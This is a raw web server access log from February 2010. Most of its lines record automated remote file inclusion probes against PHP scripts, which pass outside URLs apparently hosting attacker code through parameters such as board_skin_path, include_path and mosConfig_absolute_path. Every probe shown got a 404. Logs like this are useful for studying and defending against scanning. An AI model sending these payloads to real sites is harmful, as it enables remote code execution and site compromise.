222.239.227.209 - - [07/Feb/2010:08:48:55 -0800] "GET //gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:08:49:08 -0800] "GET /logs/access_100202.log///gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:08:49:08 -0800] "GET /logs///gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:08:49:10 -0800] "GET /logs/access_100129.log///gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:49:45 -0800] "GET /logs/access_100106.log%20%20///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:50:03 -0800] "GET /logs/access_100115.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:50:11 -0800] "GET /logs/access_100106.log%20%20///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:08:50:24 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
211.60.28.10 - - [07/Feb/2010:08:50:24 -0800] "GET /bbs/write_update.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.0" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:50:47 -0800] "GET /logs/access_100109.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:50:50 -0800] "GET /logs/access_100108.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:52:01 -0800] "GET /logs/access_100103.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:08:53:41 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:08:53:41 -0800] "GET /logs//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:08:53:41 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:53:47 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:53:47 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:53:48 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:08:54:13 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:08:54:13 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:08:54:13 -0800] "GET /logs/access_100115.log//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:08:54:18 -0800] "GET /logs/access_100201.log//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:54:18 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:54:18 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:54:18 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:54:29 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:37 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:40 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:40 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:40 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:42 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:53 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:53 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:53 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:54 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:54:54 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:22 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:22 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:22 -0800] "GET /logs/access_100202.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:27 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:27 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:55:27 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:55:57 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:55:57 -0800] "GET /logs/access_100104.log//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:55:57 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.30.148 - - [07/Feb/2010:08:55:59 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.puaga.com"
202.131.30.148 - - [07/Feb/2010:08:56:01 -0800] "GET /ideal/forum/viewtopic.php?p=20763 HTTP/1.1" 404 5258 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:56:02 -0800] "GET /logs/access_100115.log//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:56:06 -0800] "GET //vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:56:06 -0800] "GET /logs///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:56:14 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:56:51 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:56:51 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:56:51 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:02 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:09 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:09 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:09 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:08:57:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:08:57:21 -0800] "GET /logs/access_100115.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:08:57:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:57:26 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:57:26 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:57:26 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:08:57:28 -0800] "GET /logs/access_100108.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:08:57:38 -0800] "GET /logs//guestbook1//admin.php?include_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:08:57:38 -0800] "GET /guestbook1//admin.php?include_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:08:57:38 -0800] "GET /logs/access_100117.log//guestbook1//admin.php?include_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:39 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:39 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:57:43 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:43 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:43 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:43 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:44 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:44 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:44 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:08:57:48 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:50 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:50 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:50 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:57:51 -0800] "GET /logs/access_100115.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:54 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:54 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:57:54 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:58:07 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:58:08 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:58:10 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:58:13 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:58:15 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:58:26 -0800] "GET /logs/access_100115.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:59:04 -0800] "GET /logs/access_100201.log//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:20 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:20 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:08:59:20 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:59:23 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:59:23 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:59:23 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:25 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:25 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:25 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:30 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:30 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:30 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:32 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:35 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:37 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:37 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:59:45 -0800] "GET /logs/access_100115.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:08:59:45 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:08:59:59 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
